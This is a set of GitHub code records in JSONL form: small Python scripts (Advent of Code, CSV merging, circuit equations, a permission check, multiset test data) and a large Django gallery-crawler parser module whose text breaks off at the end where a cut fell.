{"seq_id":"41900874653","text":"from typing import Optional, Tuple\n\ninp: str = open('2022/inputs/d2.txt').read()\nrounds = [i.split() for i in inp.split('\\n')]\n\nmoves = {'X': 1, 'Y': 2, 'Z': 3,}\noutcome = {True: 6, None: 3, False: 0,}\n\n# Part 1\n\ndef get_outcome(opp: str, me: str) -> Optional[bool]:\n if 'ABC'.index(opp) == 'XYZ'.index(me): \n status = None\n elif ('ABC'.index(opp) + 1) == 'XYZ'.index(me) or ((opp, me) == ('C', 'X')):\n status = True\n elif ('ABC'.index(opp) - 1) == 'XYZ'.index(me) or ((opp, me) == ('A', 'Z')):\n status = False\n return status # type: ignore\n\nprint(sum((moves.get(me) + outcome.get(get_outcome(opp, me))) for opp, me in rounds))\n\n# Part 2\n\nwins = {'A': 'Y', 'B': 'Z', 'C': 'X',}\nlose = {'A': 'Z', 'B': 'X', 'C': 'Y',}\n\ndef get_move(opp: str, end: str) -> Tuple[str, Optional[bool]]: # type: ignore\n result = {'X': False, 'Y': None, 'Z': True}\n end: Optional[bool] = result.get(end)\n\n if end is None: # draw\n move = list(moves.keys())['ABC'.index(opp)]\n elif 
end is True: # win\n move = wins[opp]\n elif end is False: # lose\n move = lose[opp]\n return (move, end)\n\nprint(sum((moves.get(get_move(opp, end)[0]) + outcome.get(get_move(opp, end)[1])) for opp, end in rounds))\n","repo_name":"rperson1508/advent-of-code","sub_path":"2022/solutions/d2.py","file_name":"d2.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43922697415","text":"import csv\r\n\r\nd1 = []\r\nd2 = []\r\nwith open(\"bright_stars.csv\",\"r\")as f:\r\n csvreader=csv.reader(f)\r\n for row in csvreader:\r\n d1.append(row)\r\n\r\nwith open(\"dwarf_stars.csv\",\"r\")as f:\r\n csvreader=csv.reader(f)\r\n for row in csvreader:\r\n d2.append(row)\r\n\r\nh1 = d1[0]\r\nstar_d1 = d1[1:]\r\nh2 = d2[0]\r\nstar_d2 = d2[1:]\r\n\r\nh = h1+h2\r\n\r\nstar_d =[]\r\n\r\nfor index,datarow in enumerate(star_d1):\r\n star_d.append(star_d1[index]+star_d2[index])\r\n\r\nwith open(\"final2.csv\",\"a+\")as f:\r\n csvwriter=csv.writer(f)\r\n csvwriter.writerow(h)\r\n csvwriter.writerows(star_d) ","repo_name":"Sonakshi-Pan/merging","sub_path":"dp.py","file_name":"dp.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16597190688","text":"class Security:\n def __init__(self, abnormal_security_definition: str):\n self.security_definition = abnormal_security_definition.replace(\" \", \"\")\n self.security_dict = {}\n if self.security_definition is not None:\n for permitted_command_users in self.security_definition.split(\";\"):\n permitted_users = permitted_command_users.split(\",\")\n self.security_dict[permitted_users[0]] = permitted_users[1:]\n\n def isPermitted(self, command, user_id):\n if command not in self.security_dict:\n return True\n permitted_users = self.security_dict[command]\n if user_id in permitted_users:\n return True\n return False\n\n\n\n","repo_name":"HaIiax/battery-staple","sub_path":"command_security.py","file_name":"command_security.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20340277109","text":"# Node rule\n\ndef maxnode(shape):\n return max(max(a,b) for (a,b) in shape)\n\ndef findCurrentEquivalences(shape):\n outlist=[]\n for node in range(maxnode(shape)+1):\n currentsIn = [pos for (pos,(a,b)) in enumerate(shape) if a==node]\n currentsOut = [pos for (pos,(a,b)) in enumerate(shape) if b==node]\n \n currentsInCopy= currentsIn\n \n currentsIn = [x for x in currentsIn if x not in currentsOut]\n currentsOut = [x for x in currentsOut if x not in currentsInCopy]\n \n outlist.append((node,currentsIn,currentsOut))\n return outlist\n\ndef nodeToEquation(inlist,outlist,length):\n def assign(x):\n if x in inlist:\n return 1.0\n elif x in outlist:\n return -1.0\n else:\n return 0.0\n return [assign(x) for x in range(length)]\n\n","repo_name":"bshlgrs/circuit-solver","sub_path":"nodeRule.py","file_name":"nodeRule.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"15861475690","text":"#! 
/usr/bin/env python\n\nimport sys\nimport random\nimport collections\n\nrng = random.Random()\n\nv1 = [rng.randint(1, 100) for i in range( rng.randint(100, 200) ) ]\nv2 = [rng.randint(1, 100) for i in range( rng.randint(100, 200) ) ]\nc1 = collections.Counter(v1)\nc2 = collections.Counter(v2)\ncounted_matched = c1 & c2\nmatched = sorted(list(counted_matched.elements()))\ncounted_diffs = (c1 - c2) + (c2 - c1)\nunmatched = sorted(list(counted_diffs.elements()))\ndiff = len(unmatched)\n\nsys.stdout.write(\"{}\\n\".format(\" \".join([str(i) for i in v1])))\nsys.stdout.write(\"{}\\n\".format(\" \".join([str(i) for i in v2])))\nsys.stdout.write(\"{}\\n\".format(diff))\n","repo_name":"jeetsukumaran/pstrudel","sub_path":"test/scripts/calc-multiset-symmetric-difference.py","file_name":"calc-multiset-symmetric-difference.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"17396335889","text":"import copy\nimport json\nimport typing\nfrom datetime import datetime, timezone\nimport time\nfrom typing import Optional\n\nimport django.utils.timezone as django_tz\nimport logging\n\nimport traceback\n\nfrom collections import defaultdict\nfrom collections.abc import Callable, Iterable\n\nfrom django.db import close_old_connections\nfrom django.db.models import QuerySet, Q, Value, CharField, F\nfrom django.db.models.functions import Concat, Replace\n\nfrom core.base import utilities\nfrom core.base.utilities import send_pushover_notification, chunks\nfrom core.base.types import GalleryData\nfrom viewer.signals import wanted_gallery_found\n\nif typing.TYPE_CHECKING:\n from core.downloaders.handlers import BaseDownloader\n from core.base.setup import Settings\n from viewer.models import Gallery, WantedGallery, Archive\n\nlogger = logging.getLogger(__name__)\n\n\ndef aggregate_wanted_time_taken(func):\n def wrapper_save_time_taken(*args, **kwargs):\n start = time.perf_counter()\n func(*args, **kwargs)\n end = time.perf_counter()\n args[0].time_taken_wanted += end - start\n\n return wrapper_save_time_taken\n\n\nclass BaseParser:\n name = ''\n ignore = False\n accepted_urls: list[str] = []\n empty_list: list[str] = []\n\n __SKIP_WAIT_TIME_DOWNLOADER_TYPES = ('info', 'submit')\n\n def __init__(self, settings: 'Settings') -> None:\n self.settings = settings\n if self.name in settings.providers:\n self.own_settings = settings.providers[self.name]\n else:\n self.own_settings = None\n self.general_utils = utilities.GeneralUtils(self.settings)\n self.downloaders: list[tuple['BaseDownloader', int]] = self.settings.provider_context.get_downloaders(self.settings, self.general_utils, filter_name=self.name)\n self.last_used_downloader: Optional['BaseDownloader'] = None\n self.time_taken_wanted: float = 0\n self.archive_callback: Optional[Callable[[Optional['Archive'], Optional[str], str], None]] = None\n self.gallery_callback: Optional[Callable[[Optional['Gallery'], Optional[str], str], None]] = None\n\n # We need this dispatcher because some providers have multiple ways of getting data (single, multiple),\n # or some have priorities (json fetch, crawl gallery page).\n # Each provider should set in this method how it needs to call everything, and could even check against a setting\n # to decide (cookie is set, page is available, etc).\n # It should at least check for str (URL) and list (list of URLs).\n def fetch_gallery_data(self, url: str) -> Optional[GalleryData]:\n return None\n\n def fetch_multiple_gallery_data(self, 
url_list: list[str]) -> Optional[list[GalleryData]]:\n return None\n\n def filter_accepted_urls(self, urls: Iterable[str]) -> list[str]:\n return [x for x in urls if any(word in x for word in self.accepted_urls)]\n\n # The idea here is: if it failed and 'retry_failed' is not set, don't process\n # If it has at least 1 archive, to force redownload, 'redownload' must be set\n # If it has no archives, to force processing, 'replace_metadata' must be set\n # Skipped galleries are not processed again.\n # We don't log directly here because some methods would spam otherwise (feed crawling)\n def discard_gallery_by_internal_checks(self, gallery_id: Optional[str] = None, link: str = '', gallery: Optional['Gallery'] = None) -> tuple[bool, str]:\n\n if self.settings.update_metadata_mode:\n return False, 'Gallery link {ext_link} running in update metadata mode, processing.'.format(\n ext_link=link,\n )\n if not gallery and (gallery_id and self.settings.gallery_model):\n gallery = self.settings.gallery_model.objects.filter_first(gid=gallery_id, provider=self.name)\n if not gallery:\n return False, 'Gallery link {ext_link} has not been added, processing.'.format(\n ext_link=link,\n )\n\n if gallery.is_submitted():\n message = 'Gallery {title}, {ext_link} marked as submitted: {link}, reprocessing.'.format(\n ext_link=gallery.get_link(),\n link=gallery.get_absolute_url(),\n title=gallery.title,\n )\n return False, message\n\n if not self.settings.retry_failed and ('failed' in gallery.dl_type):\n message = 'Gallery {title}, {ext_link} failed in previous ' \\\n 'run: {link}, skipping (setting: retry_failed).'.format(\n ext_link=gallery.get_link(),\n link=gallery.get_absolute_url(),\n title=gallery.title,\n )\n return True, message\n\n if gallery.archive_set.all() and not self.settings.redownload:\n message = 'Gallery {title}, {ext_link} already added, dl_type: {dl_type} ' \\\n 'and has at least 1 archive: {link}, skipping (setting: redownload).'.format(\n ext_link=gallery.get_link(),\n link=gallery.get_absolute_url(),\n title=gallery.title,\n dl_type=gallery.dl_type\n )\n return True, message\n\n if not gallery.archive_set.all() and not self.settings.replace_metadata:\n message = 'Gallery {title}, {ext_link} already added: {link}, skipping (setting: replace_metadata).'.format(\n ext_link=gallery.get_link(),\n link=gallery.get_absolute_url(),\n title=gallery.title,\n )\n return True, message\n\n if 'skipped' in gallery.dl_type:\n message = 'Gallery {title}, {ext_link} marked as skipped: {link}, skipping.'.format(\n ext_link=gallery.get_link(),\n link=gallery.get_absolute_url(),\n title=gallery.title,\n )\n return True, message\n\n if gallery.is_deleted():\n message = 'Gallery {title}, {ext_link} marked as deleted: {link}, skipping.'.format(\n ext_link=gallery.get_link(),\n link=gallery.get_absolute_url(),\n title=gallery.title,\n )\n return True, message\n\n message = 'Gallery {title}, {ext_link} already added, but was not discarded: {link}, processing.'.format(\n ext_link=gallery.get_link(),\n link=gallery.get_absolute_url(),\n title=gallery.title,\n )\n return False, message\n\n # Priorities are: title, tags, then file count.\n @aggregate_wanted_time_taken\n def compare_gallery_with_wanted_filters(self, gallery: GalleryData, link: str, wanted_filters: QuerySet, gallery_wanted_lists: dict[str, list['WantedGallery']]) -> None:\n\n if not self.settings.found_gallery_model:\n logger.error(\"FoundGallery model has not been initiated.\")\n return\n\n if not self.settings.wanted_gallery_model:\n 
logger.error(\"WantedGallery model has not been initiated.\")\n return\n\n if gallery.title or gallery.title_jpn:\n q_objects = Q()\n q_objects_unwanted = Q()\n q_objects_regexp = Q()\n q_objects_regexp_icase = Q()\n q_objects_unwanted_regexp = Q()\n q_objects_unwanted_regexp_icase = Q()\n if gallery.title:\n wanted_filters = wanted_filters.annotate(g_title=Value(gallery.title, output_field=CharField()))\n\n q_objects.add(Q(g_title__ss=Concat(Value('%'), Replace(F('search_title'), Value(' '), Value('%')), Value('%'))), Q.OR)\n q_objects_unwanted.add(~Q(g_title__ss=Concat(Value('%'), Replace(F('unwanted_title'), Value(' '), Value('%')), Value('%'))), Q.AND)\n\n q_objects_regexp.add(Q(g_title__regex=F('search_title')), Q.OR)\n q_objects_regexp_icase.add(Q(g_title__iregex=F('search_title')), Q.OR)\n q_objects_unwanted_regexp.add(~Q(g_title__regex=F('unwanted_title')), Q.AND)\n q_objects_unwanted_regexp_icase.add(~Q(g_title__iregex=F('unwanted_title')), Q.AND)\n\n if gallery.title_jpn:\n wanted_filters = wanted_filters.annotate(g_title_jpn=Value(gallery.title_jpn, output_field=CharField()))\n q_objects.add(Q(g_title_jpn__ss=Concat(Value('%'), Replace(F('search_title'), Value(' '), Value('%')), Value('%'))), Q.OR)\n q_objects_unwanted.add(~Q(g_title_jpn__ss=Concat(Value('%'), Replace(F('unwanted_title'), Value(' '), Value('%')), Value('%'))), Q.AND)\n\n q_objects_regexp.add(Q(g_title_jpn__regex=F('search_title')), Q.OR)\n q_objects_regexp_icase.add(Q(g_title_jpn__iregex=F('search_title')), Q.OR)\n q_objects_unwanted_regexp.add(~Q(g_title_jpn__regex=F('unwanted_title')), Q.AND)\n q_objects_unwanted_regexp_icase.add(~Q(g_title_jpn__iregex=F('unwanted_title')), Q.AND)\n\n filtered_wanted: QuerySet[WantedGallery] = wanted_filters.filter(\n Q(search_title__isnull=True)\n | Q(search_title='')\n | Q(Q(regexp_search_title=False), q_objects)\n | Q(Q(regexp_search_title=True, regexp_search_title_icase=False), q_objects_regexp)\n | Q(Q(regexp_search_title=True, regexp_search_title_icase=True), q_objects_regexp_icase)\n ).filter(\n Q(unwanted_title__isnull=True)\n | Q(unwanted_title='')\n | Q(Q(regexp_unwanted_title=False), q_objects_unwanted)\n | Q(Q(regexp_unwanted_title=True, regexp_unwanted_title_icase=False), q_objects_unwanted_regexp)\n | Q(Q(regexp_unwanted_title=True, regexp_unwanted_title_icase=True), q_objects_unwanted_regexp_icase)\n )\n\n else:\n filtered_wanted = wanted_filters.filter(\n Q(search_title__isnull=True) | Q(search_title='')\n ).filter(\n Q(unwanted_title__isnull=True) | Q(unwanted_title='')\n )\n\n if gallery.posted:\n filtered_wanted = filtered_wanted.filter(\n Q(wait_for_time__isnull=True) | Q(wait_for_time__lte=django_tz.now() - gallery.posted)\n )\n\n filtered_wanted = filtered_wanted.prefetch_related(\n 'wanted_providers',\n 'unwanted_providers',\n 'wanted_tags',\n 'unwanted_tags'\n )\n\n already_founds = self.settings.found_gallery_model.objects.filter(\n wanted_gallery__in=filtered_wanted,\n gallery__gid=gallery.gid,\n gallery__provider=self.name\n ).select_related(\n 'gallery',\n 'wanted_gallery'\n )\n\n for wanted_filter in filtered_wanted:\n # Skip wanted_filter that's already found.\n already_found = [x for x in already_founds if x.wanted_gallery.id == wanted_filter.id]\n # Skip already found unless it's a submitted gallery.\n if already_found and not already_found[0].gallery.is_submitted():\n continue\n # Skip wanted_filter that's not a global filter or is not for this provider.\n if wanted_filter.wanted_providers.count():\n if not 
wanted_filter.wanted_providers.filter(slug=self.name).first():\n continue\n if wanted_filter.unwanted_providers.count():\n if wanted_filter.unwanted_providers.filter(slug=self.name).first():\n continue\n accepted = True\n if bool(wanted_filter.wanted_tags.all()):\n if not set(wanted_filter.wanted_tags_list()).issubset(set(gallery.tags)):\n accepted = False\n # Review based on 'accept if none' scope.\n if not accepted and wanted_filter.wanted_tags_accept_if_none_scope:\n missing_tags = set(wanted_filter.wanted_tags_list()).difference(set(gallery.tags))\n # If all the missing tags start with the parameter,\n # and no other tag is in gallery with this parameter, mark as accepted\n scope_formatted = wanted_filter.wanted_tags_accept_if_none_scope + \":\"\n if all(x.startswith(scope_formatted) for x in missing_tags)\\\n and not any(x.startswith(scope_formatted) for x in gallery.tags):\n accepted = True\n # Do not accept galleries that have more than 1 tag in the same wanted tag scope.\n if accepted & wanted_filter.wanted_tags_exclusive_scope:\n accepted_tags = set(wanted_filter.wanted_tags_list()).intersection(set(gallery.tags))\n gallery_tags_scopes = [x.split(\":\", maxsplit=1)[0] for x in gallery.tags if len(x) > 1]\n wanted_gallery_tags_scopes = [x.split(\":\", maxsplit=1)[0] for x in accepted_tags if len(x) > 1]\n scope_count: dict[str, int] = defaultdict(int)\n for scope_name in gallery_tags_scopes:\n if scope_name in wanted_gallery_tags_scopes:\n if wanted_filter.exclusive_scope_name:\n if wanted_filter.exclusive_scope_name == scope_name:\n scope_count[scope_name] += 1\n else:\n scope_count[scope_name] += 1\n for scope, count in scope_count.items():\n if count > 1:\n accepted = False\n if not accepted:\n continue\n\n if not accepted:\n continue\n\n if bool(wanted_filter.unwanted_tags.all()):\n if any(item in gallery.tags for item in wanted_filter.unwanted_tags_list()):\n continue\n if wanted_filter.wanted_page_count_lower and gallery.filecount is not None and gallery.filecount:\n if not int(gallery.filecount) >= wanted_filter.wanted_page_count_lower:\n continue\n if wanted_filter.wanted_page_count_upper and gallery.filecount is not None and gallery.filecount:\n if not int(gallery.filecount) <= wanted_filter.wanted_page_count_upper:\n continue\n if wanted_filter.category and gallery.category is not None and gallery.category:\n if not (wanted_filter.category.lower() == gallery.category.lower()):\n continue\n\n gallery_wanted_lists[gallery.gid].append(wanted_filter)\n\n if len(gallery_wanted_lists[gallery.gid]) > 0:\n self.settings.wanted_gallery_model.objects.filter(id__in=[x.pk for x in gallery_wanted_lists[gallery.gid]]).update(\n found=True,\n date_found=django_tz.now()\n )\n\n logger.info(\"Gallery link: {}, title: {}, matched filters: {}.\".format(\n link,\n gallery.title,\n \", \".join([x.get_absolute_url() for x in gallery_wanted_lists[gallery.gid]])\n ))\n\n notify_wanted_filters = [\n \"({}, {})\".format((x.title or 'not set'), (x.reason or 'not set')) for x in\n gallery_wanted_lists[gallery.gid] if x.notify_when_found\n ]\n\n if notify_wanted_filters and self.settings.pushover.enable:\n\n message = \"Title: {}, link: {}\\nFilters title, reason: {}\".format(\n gallery.title,\n link,\n ', '.join(notify_wanted_filters)\n )\n\n send_pushover_notification(\n self.settings.pushover.user_key,\n self.settings.pushover.token,\n message,\n device=self.settings.pushover.device,\n sound=self.settings.pushover.sound,\n title=\"Wanted Gallery match found\"\n )\n return\n\n @staticmethod\n def 
id_from_url(url: str) -> Optional[str]:\n pass\n\n @staticmethod\n def token_from_url(url: str) -> Optional[str]:\n pass\n\n @classmethod\n def id_from_url_implemented(cls) -> bool:\n if cls.id_from_url is not BaseParser.id_from_url:\n return True\n return False\n\n def get_feed_urls(self) -> list[str]:\n return self.empty_list\n\n def crawl_feed(self, feed_url: str = '') -> list[typing.Any]:\n return self.empty_list\n\n def feed_urls_implemented(self) -> bool:\n if type(self).crawl_feed is not BaseParser.crawl_feed and type(self).get_feed_urls is not BaseParser.get_feed_urls:\n return True\n return False\n\n def crawl_urls_caller(\n self, urls: list[str],\n wanted_filters: Optional[QuerySet] = None, wanted_only: bool = False,\n preselected_wanted_matches: Optional[dict[str, list['WantedGallery']]] = None\n ):\n try:\n self.crawl_urls(\n urls, wanted_filters=wanted_filters, wanted_only=wanted_only,\n preselected_wanted_matches=preselected_wanted_matches\n )\n except BaseException:\n logger.critical(traceback.format_exc())\n close_old_connections()\n\n def crawl_urls(\n self, urls: list[str],\n wanted_filters: Optional[QuerySet] = None, wanted_only: bool = False,\n preselected_wanted_matches: Optional[dict[str, list['WantedGallery']]] = None\n ) -> None:\n pass\n\n def post_gallery_processing(self, gallery_entry: 'Gallery', gallery_data: 'GalleryData'):\n pass\n\n def is_current_link_non_current(self, gallery_data: 'GalleryData') -> bool:\n return False\n\n def pass_gallery_data_to_downloaders(self, gallery_data_list: list[GalleryData], gallery_wanted_lists: dict[str, list['WantedGallery']], force_provider: bool = False):\n gallery_count = len(gallery_data_list)\n\n if self.time_taken_wanted:\n logger.info(\n \"Time taken to compare with WantedGallery: {} seconds.\".format(int(self.time_taken_wanted + 0.5)))\n\n if gallery_count == 0:\n logger.info(\"No galleries need downloading, returning.\")\n return\n else:\n logger.info(\"{} galleries for downloaders to work with.\".format(gallery_count))\n\n if not self.settings.update_metadata_mode:\n downloaders_msg = 'Downloaders (name, priority):'\n\n for downloader in self.downloaders:\n downloaders_msg += \" ({}, {})\".format(downloader[0], downloader[1])\n logger.info(downloaders_msg)\n\n for i, gallery in enumerate(gallery_data_list, start=1):\n if self.last_used_downloader is not None and self.last_used_downloader.type not in self.__SKIP_WAIT_TIME_DOWNLOADER_TYPES:\n # We can't assume that every parser has its own downloader,\n # could be from another provider, so we can't directly use self.own_settings\n last_used_provider = self.last_used_downloader.provider\n if last_used_provider in self.settings.providers:\n time.sleep(self.settings.providers[last_used_provider].wait_timer)\n elif self.own_settings:\n time.sleep(self.own_settings.wait_timer)\n else:\n time.sleep(self.settings.wait_timer)\n logger.info(\"Working with gallery {} of {}\".format(i, gallery_count))\n if self.settings.add_as_public:\n gallery.public = True\n self.work_gallery_data(gallery, gallery_wanted_lists, force_provider)\n\n def work_gallery_data(self, gallery: GalleryData, gallery_wanted_lists: dict[str, list['WantedGallery']], force_provider: bool = False) -> None:\n\n if not self.settings.found_gallery_model:\n logger.error(\"FoundGallery model has not been initiated.\")\n return\n\n if gallery.title is not None:\n logger.info(\"Title: {}. 
Link: {}\".format(gallery.title, gallery.link))\n else:\n logger.info(\"Link: {}\".format(gallery.link))\n\n # If there's a WG match, and we are processing submitted galleries, revert the downloaders to default.\n if len(gallery_wanted_lists[gallery.gid]) > 0 and len(self.downloaders) == 1 and self.downloaders[0][0].type == 'submit':\n to_use_downloaders = self.settings.provider_context.get_downloaders(\n self.settings, self.general_utils,\n filter_name=self.name, priorities=self.settings.back_up_downloaders\n )\n downloaders_msg = 'WantedGallery match, reverting to default downloaders (name, priority):'\n for downloader in to_use_downloaders:\n downloaders_msg += \" ({}, {})\".format(downloader[0], downloader[1])\n logger.info(downloaders_msg)\n elif force_provider:\n to_use_downloaders = self.settings.provider_context.get_downloaders(\n self.settings, self.general_utils,\n filter_name=gallery.provider\n )\n downloaders_msg = 'Forcing downloaders to Gallery provider: {}. Downloaders (name, priority):'.format(gallery.provider)\n for downloader in to_use_downloaders:\n downloaders_msg += \" ({}, {})\".format(downloader[0], downloader[1])\n logger.info(downloaders_msg)\n else:\n to_use_downloaders = self.downloaders\n\n is_link_non_current = False\n\n if self.settings.non_current_links_as_deleted:\n is_link_non_current = self.is_current_link_non_current(gallery)\n if is_link_non_current:\n to_use_downloaders = self.settings.provider_context.get_downloaders(\n self.settings, self.general_utils,\n filter_name=\"{}_info\".format(self.name), force=True\n )\n logger.info(\n \"Link: {} detected as non-current, it will be added as deleted.\".format(\n gallery.link\n )\n )\n\n for cnt, downloader in enumerate(to_use_downloaders):\n downloader[0].init_download(copy.deepcopy(gallery), wanted_gallery_list=gallery_wanted_lists[gallery.gid])\n\n if downloader[0].return_code == 1:\n\n if (cnt + 1) == len(to_use_downloaders) and downloader[0].mark_hidden_if_last:\n if downloader[0].gallery_db_entry:\n downloader[0].gallery_db_entry.hidden = True\n downloader[0].gallery_db_entry.simple_save()\n\n self.last_used_downloader = downloader[0]\n if not downloader[0].archive_only:\n for wanted_gallery in gallery_wanted_lists[gallery.gid]:\n self.settings.found_gallery_model.objects.get_or_create(\n wanted_gallery=wanted_gallery,\n gallery=downloader[0].gallery_db_entry\n )\n\n if len(gallery_wanted_lists[gallery.gid]) > 0:\n wanted_gallery_found.send(\n sender=self.settings.gallery_model,\n gallery=downloader[0].gallery_db_entry,\n archive=downloader[0].archive_db_entry,\n wanted_gallery_list=gallery_wanted_lists[gallery.gid]\n )\n if downloader[0].archive_db_entry:\n if not downloader[0].archive_only and downloader[0].gallery_db_entry:\n logger.info(\n \"Download complete, using downloader: {}. Archive link: {}. Gallery link: {}\".format(\n downloader[0],\n downloader[0].archive_db_entry.get_absolute_url(),\n downloader[0].gallery_db_entry.get_absolute_url()\n )\n )\n if self.gallery_callback:\n self.gallery_callback(downloader[0].gallery_db_entry, gallery.link, 'success')\n if self.archive_callback:\n self.archive_callback(downloader[0].archive_db_entry, gallery.link, 'success')\n else:\n logger.info(\n \"Download complete, using downloader: {}. Archive link: {}. 
No gallery associated\".format(\n downloader[0],\n downloader[0].archive_db_entry.get_absolute_url(),\n )\n )\n if self.archive_callback:\n self.archive_callback(downloader[0].archive_db_entry, gallery.link, 'success')\n elif downloader[0].gallery_db_entry:\n logger.info(\n \"Download completed successfully (gallery only), using downloader: {}. Gallery link: {}\".format(\n downloader[0],\n downloader[0].gallery_db_entry.get_absolute_url()\n )\n )\n if self.gallery_callback:\n self.gallery_callback(downloader[0].gallery_db_entry, gallery.link, 'success')\n\n # Process possible nested galleries (contained, magazine)\n # To avoid downloading extra Archives, it will only be possible to auto-add Gallery-only downloads\n # Second, to avoid keeping track of already processed galleries, considering they could be\n # downloaded from different queues, it will only work 1 level deep, so that no infinite\n # nesting happens\n # Note that we have a filter here to not add galleries that already exist.\n # If the gallery already exists, the relationship will be set backwards, without\n # needing to process the Gallery directly\n # Also, don't auto download related galleries when checking submissions\n if not self.settings.stop_nested and \\\n self.settings.auto_download_nested and \\\n self.settings.workers.web_queue and \\\n self.settings.gallery_model and \\\n self.downloaders[0][0].type != 'submit':\n if gallery.gallery_contains_gids:\n existing_gids = self.settings.gallery_model.objects.filter(\n gid__in=gallery.gallery_contains_gids,\n provider=gallery.provider\n ).values_list('gid', flat=True)\n\n gallery_urls = [\n self.settings.gallery_model(gid=x, provider=gallery.provider).get_link() for x in gallery.gallery_contains_gids if x not in existing_gids\n ]\n gallery_urls.append(\"--stop-nested\")\n\n logger.info(\n \"Gallery: {} contains galleries: {}, adding to queue\".format(\n downloader[0].gallery_db_entry.get_absolute_url(),\n gallery_urls\n )\n )\n\n self.settings.workers.web_queue.enqueue_args_list(gallery_urls)\n\n if gallery.magazine_chapters_gids:\n existing_gids = self.settings.gallery_model.objects.filter(\n gid__in=gallery.magazine_chapters_gids,\n provider=gallery.provider\n ).values_list('gid', flat=True)\n\n gallery_urls = [\n self.settings.gallery_model(gid=x, provider=gallery.provider).get_link() for x in gallery.magazine_chapters_gids if x not in existing_gids\n ]\n gallery_urls.append(\"--stop-nested\")\n\n logger.info(\n \"Gallery: {} is a magazine and contains galleries: {}, adding to queue\".format(\n downloader[0].gallery_db_entry.get_absolute_url(),\n gallery_urls\n )\n )\n\n self.settings.workers.web_queue.enqueue_args_list(gallery_urls)\n\n if gallery.magazine_gid and not self.settings.gallery_model.objects.filter(gid=gallery.magazine_gid, provider=gallery.provider):\n gallery_url = self.settings.gallery_model(gid=gallery.magazine_gid, provider=gallery.provider).get_link()\n logger.info(\n \"Gallery: {} is in magazine: {}, adding to queue\".format(\n downloader[0].gallery_db_entry.get_absolute_url(),\n gallery_url\n )\n )\n self.settings.workers.web_queue.enqueue_args_list([gallery_url, \"--stop-nested\"])\n\n if gallery.gallery_container_gid and not self.settings.gallery_model.objects.filter(gid=gallery.gallery_container_gid, provider=gallery.provider):\n gallery_url = self.settings.gallery_model(gid=gallery.gallery_container_gid, provider=gallery.provider).get_link()\n logger.info(\n \"Gallery: {} is contained in: {}, adding to queue\".format(\n 
downloader[0].gallery_db_entry.get_absolute_url(),\n gallery_url\n )\n )\n self.settings.workers.web_queue.enqueue_args_list([gallery_url, \"--stop-nested\"])\n\n self.post_gallery_processing(downloader[0].gallery_db_entry, gallery)\n\n if self.settings.non_current_links_as_deleted:\n if is_link_non_current:\n downloader[0].gallery_db_entry.mark_as_deleted()\n\n return\n elif downloader[0].return_code == 0 and (cnt + 1) == len(to_use_downloaders):\n self.last_used_downloader = None\n if not downloader[0].archive_only:\n downloader[0].original_gallery = gallery\n downloader[0].original_gallery.dl_type = 'failed'\n downloader[0].original_gallery.hidden = True\n downloader[0].update_gallery_db()\n if downloader[0].gallery_db_entry:\n logger.warning(\n \"Download completed unsuccessfully using downloader: {},\"\n \" set as failed as it\\'s the last one. Gallery link: {}\".format(\n downloader[0],\n downloader[0].gallery_db_entry.get_absolute_url()\n )\n )\n if self.gallery_callback:\n self.gallery_callback(downloader[0].gallery_db_entry, gallery.link, 'failed')\n for wanted_gallery in gallery_wanted_lists[gallery.gid]:\n self.settings.found_gallery_model.objects.get_or_create(\n wanted_gallery=wanted_gallery,\n gallery=downloader[0].gallery_db_entry\n )\n\n self.post_gallery_processing(downloader[0].gallery_db_entry, gallery)\n\n if self.settings.non_current_links_as_deleted:\n if self.is_current_link_non_current(gallery):\n downloader[0].gallery_db_entry.mark_as_deleted()\n\n else:\n logger.warning(\n \"Download completed unsuccessfully using downloader: {},\"\n \" could not set as failed, no entry was updated on the database\".format(\n downloader[0]\n )\n )\n else:\n logger.warning(\n \"Download completed unsuccessfully using downloader: {},\"\n \" no entry was updated on the database\".format(downloader[0])\n )\n if self.gallery_callback:\n self.gallery_callback(None, gallery.link, 'failed')\n else:\n logger.info(\n \"Download was unsuccessful, using downloader {}. 
Trying with the next downloader.\".format(\n downloader[0],\n )\n )\n\n\n# This assumes we got the data in the format that the API uses (\"gc\" format).\nclass InternalParser(BaseParser):\n name = ''\n ignore = True\n\n def crawl_json(self, json_string: str, wanted_filters: Optional[QuerySet] = None, wanted_only: bool = False) -> None:\n\n if not self.settings.gallery_model:\n return\n\n dict_list = []\n json_decoded = json.loads(json_string)\n\n if type(json_decoded) == dict:\n dict_list.append(json_decoded)\n elif type(json_decoded) == list:\n dict_list = json_decoded\n\n galleries_gids = []\n found_galleries = set()\n total_galleries_filtered: list[GalleryData] = []\n gallery_wanted_lists: dict[str, list['WantedGallery']] = defaultdict(list)\n\n for gallery in dict_list:\n galleries_gids.append(gallery['gid'])\n gallery['posted'] = datetime.fromtimestamp(int(gallery['posted']), timezone.utc)\n gallery_data = GalleryData(**gallery)\n total_galleries_filtered.append(gallery_data)\n\n for galleries_gid_group in list(chunks(galleries_gids, 900)):\n for found_gallery in self.settings.gallery_model.objects.filter(gid__in=galleries_gid_group):\n discard_approved, discard_message = self.discard_gallery_by_internal_checks(\n gallery=found_gallery,\n link=found_gallery.get_link()\n )\n\n if discard_approved:\n logger.info(discard_message)\n found_galleries.add(found_gallery.gid)\n\n for count, gallery_data in enumerate(total_galleries_filtered):\n\n if gallery_data.gid in found_galleries:\n continue\n\n banned_result, banned_reasons = self.general_utils.discard_by_gallery_data(gallery_data.tags, gallery_data.uploader)\n\n if banned_result:\n logger.info(\n \"Gallery {} of {}: Skipping gallery link {}, discarded reasons: {}\".format(\n count,\n len(total_galleries_filtered),\n gallery_data.title,\n banned_reasons\n )\n )\n continue\n\n if wanted_filters:\n self.compare_gallery_with_wanted_filters(\n gallery_data,\n gallery_data.link,\n wanted_filters,\n gallery_wanted_lists\n )\n if wanted_only and not gallery_wanted_lists[gallery_data.gid]:\n continue\n\n logger.info(\n \"Gallery {} of {}: Gallery {} will be 